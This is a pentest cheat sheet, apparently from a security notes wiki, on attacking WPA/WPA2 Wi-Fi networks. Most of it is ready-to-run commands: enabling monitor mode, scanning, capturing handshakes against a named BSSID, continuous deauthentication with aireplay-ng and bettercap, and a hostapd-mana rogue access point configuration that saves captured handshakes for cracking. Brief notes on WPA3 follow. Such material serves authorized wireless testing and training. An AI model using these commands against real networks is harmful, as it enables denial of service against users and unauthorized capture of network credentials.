WPA/ WPA-2/ WPA-3

Manual:

Set Monitor more:

airmon-ng start wlan0
OR 
sudo iw dev wlan0 interface add wlan0mon type monitor
sudo ip link set wlan0mon up

Scan:

sudo airodump-ng wlan0mon 
OR 
sudo iw dev wlan0 scan | egrep "DS Parameter set|SSID:"

Capture:

sudo airodump-ng -c 3 --bssid 34:08:04:09:3D:38 -w cap1 wlan0mon

Deauth: 

sudo aireplay-ng -0 0 -a 34:08:04:09:3D:38 wlan0mon

-0 0 = deauth continously

deauth using the same adapter (:

Automatic:

Bettercap:

bettercap -i wlan0mon 
wifi.recon on 
ticker on 
wifi.deauth BSSID

Rouge AP

hostapd-mana Configuration

nano Mostar-mana.conf

interface=wlan0
ssid=Mostar
channel=1
hw_mode=g
ieee80211n=1
wpa=3
wpa_key_mgmt=WPA-PSK
wpa_passphrase=ANYPASSWORD
wpa_pairwise=TKIP CCMP
rsn_pairwise=TKIP CCMP
mana_wpaout=/home/kali/mostar.hccapx

By default, hostapd-mana will run in 802.11b. In order to meet our target's settings, we need to change this to IEEE 802.11n. To accomplish this, we set the ieee80211n parameter to "1" in order to enable 802.11n. Next, we need to specify the band to 2.4 GHz by setting the hw_mode parameter to the letter "g". If the network was running on 5 GHz, we would set hw_mode to "a".

set the wpa parameter to the integer "3" to enable both WPA and WPA2 (setting this parameter to "1" enables only WPA and setting the value to "2" enables only WPA2).

set the rsn_pairwise to "TKIP CCMP" as well in order to enable TKIP/CCMP with WPA2

Enable: 

sudo hostapd-mana Mostar-mana.conf

LogoGitHub - DominikStyp/WPA-Attack: WPA Attack - Easy breaking WPA WPA2 networks by typing one commandGitHub

WPA-3

WPA3 shares similarities with WPA, but it uses the much stronger Simultaneous Authentication of Equals (SAE), and it is not yet vulnerable to offline attacks. The same goes for Enhanced Open, also known as Opportunistic Wireless Encryption (OWE). We won't cover WPA3 networks in this module.

They can also passively listen, and with the exception of WPA3, decrypt everybody's communications.

WPA3 is not always a viable option. Setup can be an extremely complex endeavor for network administrators, especially considering how much they will need to learn about of Public Key Infrastructure (PKI)1 in order to get things up and running.

PreviousWEPNextWPA-Enterprise

Last updated